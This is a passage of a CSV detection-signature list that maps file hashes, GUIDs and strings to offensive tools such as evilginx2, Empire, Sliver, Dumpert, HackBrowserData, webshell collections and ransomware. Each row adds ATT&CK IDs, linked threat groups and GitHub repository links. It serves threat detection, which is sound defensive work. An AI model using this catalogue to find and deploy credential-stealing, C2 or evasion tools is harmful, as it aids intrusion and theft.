Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29844" "*7fcc036a7fba571b7f2928f0a6a0e0838cb9e1a2a8231f9c30ce5baa144e8108*",".{0,1000}7fcc036a7fba571b7f2928f0a6a0e0838cb9e1a2a8231f9c30ce5baa144e8108.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","29845" "*7fd016446b62d4ea4aa197de85f3f45f58cf0f0f85c1cd9d7bf37fdee27d182b*",".{0,1000}7fd016446b62d4ea4aa197de85f3f45f58cf0f0f85c1cd9d7bf37fdee27d182b.{0,1000}","offensive_tool_keyword","tun2socks","socks 
tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29846" "*7fd9f158c430a2d17fcd8fac698cfe71ef4f6530c2df824247c651acd6a1f03e*",".{0,1000}7fd9f158c430a2d17fcd8fac698cfe71ef4f6530c2df824247c651acd6a1f03e.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","29848" "*7fdb39ce9dcd83556dccda4a7480917b87ddef21edc96db5f0a1d134c40453cd*",".{0,1000}7fdb39ce9dcd83556dccda4a7480917b87ddef21edc96db5f0a1d134c40453cd.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","29849" "*7FDCF4E0-2E6A-43D5-80FB-0A1A40AB3D93*",".{0,1000}7FDCF4E0\-2E6A\-43D5\-80FB\-0A1A40AB3D93.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","0","#GUIDproject","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","29851" "*7fdf7529eb3c25f47136fa12a74040e38f4eda6cdd66f760977e537a292abea6*",".{0,1000}7fdf7529eb3c25f47136fa12a74040e38f4eda6cdd66f760977e537a292abea6.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - 
T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","29852" "*7fe4d08596fc13f16ed9bc29345a09a153e7e006bad88289836092bfc0e1ff1d*",".{0,1000}7fe4d08596fc13f16ed9bc29345a09a153e7e006bad88289836092bfc0e1ff1d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","29853" "*7fe5b73ee8105622ab74be4fae9f5f0a9b2a8b496770d84b58a7c0ce8a457551*",".{0,1000}7fe5b73ee8105622ab74be4fae9f5f0a9b2a8b496770d84b58a7c0ce8a457551.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - 
TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","29854" "*7fef9543926764b6093a5ab10ea9d092f9a97acae14dbfd423a7c52cc9454fdb*",".{0,1000}7fef9543926764b6093a5ab10ea9d092f9a97acae14dbfd423a7c52cc9454fdb.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#filehash","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","29855" "*7ffa4105462bd53c5b1632324b3e7ddb71b18b57e8ecd60fc849b433a036198e*",".{0,1000}7ffa4105462bd53c5b1632324b3e7ddb71b18b57e8ecd60fc849b433a036198e.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","29860" "*7ffce7f6d7262f214d78e6b7fd8d07119835cba4b04ce334260665d7c8fb369a*",".{0,1000}7ffce7f6d7262f214d78e6b7fd8d07119835cba4b04ce334260665d7c8fb369a.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","#filehash","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","29861" "*7H0LmBxFtXBPd0/3vHe7Z3dmdrPZmTzp3ZldQrJ5LOGxeZ*",".{0,1000}7H0LmBxFtXBPd0\/3vHe7Z3dmdrPZmTzp3ZldQrJ5LOGxeZ.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral 
Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","N/A","8","3","282","57","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z","29863" "*7L0LgBxFtTDc093TPe/dntnM7G6Sncm*",".{0,1000}7L0LgBxFtTDc093TPe\/dntnM7G6Sncm.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","N/A","8","3","282","57","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z","29865" "*7tkffbh3qiumpfjfq77plcorjmfohmbj6nwq5je6herbpya6kmgoafid.onion*",".{0,1000}7tkffbh3qiumpfjfq77plcorjmfohmbj6nwq5je6herbpya6kmgoafid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","29866" "*7z2john.pl*",".{0,1000}7z2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","29867" "*80 253 149 118 169 176 183 169 182 184*",".{0,1000}80\s253\s149\s118\s169\s176\s183\s169\s182\s184.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#content","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","29868" 
"*8002519fb85548854d30580a8db65ccd4624ce284d13230ad8b3e6366c8f093a*",".{0,1000}8002519fb85548854d30580a8db65ccd4624ce284d13230ad8b3e6366c8f093a.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#filehash","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","29870" "*80063f3e9fee6ced4f159714bd00ba61d757fd185621d82330bed16d4c2eb495*",".{0,1000}80063f3e9fee6ced4f159714bd00ba61d757fd185621d82330bed16d4c2eb495.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29871" "*80086e7ab0990319d4f61b69990eda05ff16dcd836c3b489b2bf8a189bc0c08e*",".{0,1000}80086e7ab0990319d4f61b69990eda05ff16dcd836c3b489b2bf8a189bc0c08e.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","29873" "*80096ca34a483165ffbef283b6afa771d8a4883a2d231604f7638a682b8a44f2*",".{0,1000}80096ca34a483165ffbef283b6afa771d8a4883a2d231604f7638a682b8a44f2.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#filehash","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","29874" "*8009852738404fcfead7a80baac530fe2a8633d4dcdc17cb9230fa69b026a72b*",".{0,1000}8009852738404fcfead7a80baac530fe2a8633d4dcdc17cb9230fa69b026a72b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29875" "*8009a7f38189b6bdc8e8afca6fc2aa27ab1ca09525e36e3664de8436b78cf439*",".{0,1000}8009a7f38189b6bdc8e8afca6fc2aa27ab1ca09525e36e3664de8436b78cf439.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29876" 
"*800ddc434bc8cd851417eba662314bbf37c893ee3e3ab715da5fb386c29103f0*",".{0,1000}800ddc434bc8cd851417eba662314bbf37c893ee3e3ab715da5fb386c29103f0.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29877" "*8011deee58ffff8edb641b0c964481a3f1e00978abc96904c1922d1ac88e243a*",".{0,1000}8011deee58ffff8edb641b0c964481a3f1e00978abc96904c1922d1ac88e243a.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","29878" "*8019f095c7cf482767df31cd411cc53c4e30a23c599aa9381391326a6e7c6304*",".{0,1000}8019f095c7cf482767df31cd411cc53c4e30a23c599aa9381391326a6e7c6304.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","29881" "*801cf83159c4f8e926bbd62cce010fc436d5ed036f589b4269b866f6a3657bda*",".{0,1000}801cf83159c4f8e926bbd62cce010fc436d5ed036f589b4269b866f6a3657bda.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29883" 
"*801e85a2cc2b8d16312799bd16dc5d05985f4f2577b2d7d90ba71bd35c8ba180*",".{0,1000}801e85a2cc2b8d16312799bd16dc5d05985f4f2577b2d7d90ba71bd35c8ba180.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","29884" "*80220edbb4afa4dde08d9f9ba2f980681769b7376f2bf42ef27a7487cfcb799d*",".{0,1000}80220edbb4afa4dde08d9f9ba2f980681769b7376f2bf42ef27a7487cfcb799d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29885" "*80230cc6c13af45f3e6a03afdb2ec31b219893ee2da3ffd2da78317e807741d5*",".{0,1000}80230cc6c13af45f3e6a03afdb2ec31b219893ee2da3ffd2da78317e807741d5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29887" 
"*8026261f-ac68-4ccf-97b2-3b55b7d6684d*",".{0,1000}8026261f\-ac68\-4ccf\-97b2\-3b55b7d6684d.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","29889" "*802a7ba4f023cd272eba8de0488848a7667ac0eeb3844108bdca994491846404*",".{0,1000}802a7ba4f023cd272eba8de0488848a7667ac0eeb3844108bdca994491846404.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","0","#filehash","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","29891" "*802cc16a8b00b49fbc1685cdfa652fabe7b53d5d0e1fe1a1da4ab0da59ec263f*",".{0,1000}802cc16a8b00b49fbc1685cdfa652fabe7b53d5d0e1fe1a1da4ab0da59ec263f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","29892" "*80326cd79c767a6230f8b271ac764743b204d6c1af6cf7ac464ba5919f037e0d*",".{0,1000}80326cd79c767a6230f8b271ac764743b204d6c1af6cf7ac464ba5919f037e0d.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of 
retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","29893" "*8034c131c03f032538aac5c7619732804c64e7e619e4dc27614ecedfdbe2afd5*",".{0,1000}8034c131c03f032538aac5c7619732804c64e7e619e4dc27614ecedfdbe2afd5.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","29895" "*803c76c8edc3cb686137d642d75fcedd54b89461c719504f2e5f8a3235c3f7c3*",".{0,1000}803c76c8edc3cb686137d642d75fcedd54b89461c719504f2e5f8a3235c3f7c3.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","0","#filehash","N/A","8","1","N/A","N/A","N/A","N/A","29896" "*803fb03b9ae22f31ebb1db44628636c063311b3fab30626f9224dd954b7028a9*",".{0,1000}803fb03b9ae22f31ebb1db44628636c063311b3fab30626f9224dd954b7028a9.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 
- T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29897" "*8045dd05e50f88b109a05dbd39d98aa7a0ca95d45f62d6aba817a5b257c366f7*",".{0,1000}8045dd05e50f88b109a05dbd39d98aa7a0ca95d45f62d6aba817a5b257c366f7.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29899" "*804E7688C41C080042845DEA6461DAE99DAB16204788E4BEE1C7476AD1280674*",".{0,1000}804E7688C41C080042845DEA6461DAE99DAB16204788E4BEE1C7476AD1280674.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","#filehash","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","29900" "*805d62d6cb854199c313f9724cf44a1ec63e8d35b9de235f529cd562fba6011d*",".{0,1000}805d62d6cb854199c313f9724cf44a1ec63e8d35b9de235f529cd562fba6011d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29903" "*806ffe052652b8848d19fe26c63ecc35742077d87bbe04102b048a7c9c644c22*",".{0,1000}806ffe052652b8848d19fe26c63ecc35742077d87bbe04102b048a7c9c644c22.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - 
T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#filehash","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","29909" "*80736669542D3727C77CCDA1589F9D7C17568A1D97D98FFAE84AFBBBF081BE67*",".{0,1000}80736669542D3727C77CCDA1589F9D7C17568A1D97D98FFAE84AFBBBF081BE67.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","29910" "*80777fb99fdfa860d11e9701de35fe4addb56b66d3382ee514758d367610395a*",".{0,1000}80777fb99fdfa860d11e9701de35fe4addb56b66d3382ee514758d367610395a.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","29911" "*8077c66a6fbdc3a6c6a13628b2a5de8a21a366222cd38bed0c9d40901a01c792*",".{0,1000}8077c66a6fbdc3a6c6a13628b2a5de8a21a366222cd38bed0c9d40901a01c792.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29912" 
"*80781550fa32f8a74539450563a7eac0a49ae8d226381e4b496c7c87250a9c0e*",".{0,1000}80781550fa32f8a74539450563a7eac0a49ae8d226381e4b496c7c87250a9c0e.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","29913" "*808843c9419ba2e42881ef4f4ad3087874d3d7088d16fb6dbf6508f05a1189c8*",".{0,1000}808843c9419ba2e42881ef4f4ad3087874d3d7088d16fb6dbf6508f05a1189c8.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","29917" "*80897c682d005f5382cd3da5121a2e394f293213848c7e0bc0747381481b142a*",".{0,1000}80897c682d005f5382cd3da5121a2e394f293213848c7e0bc0747381481b142a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29918" "*808ae003016831e085d1d08f06b62fd7e9aa647224d0d21f8594b54f9c52b548*",".{0,1000}808ae003016831e085d1d08f06b62fd7e9aa647224d0d21f8594b54f9c52b548.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - 
T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29919" "*808Mak1r/GodzillaSource*",".{0,1000}808Mak1r\/GodzillaSource.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","29920" "*8093f462616ec9e222eb6dac9abcff21a6dca3075283e7daca3d209e81cb85f6*",".{0,1000}8093f462616ec9e222eb6dac9abcff21a6dca3075283e7daca3d209e81cb85f6.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","29921" 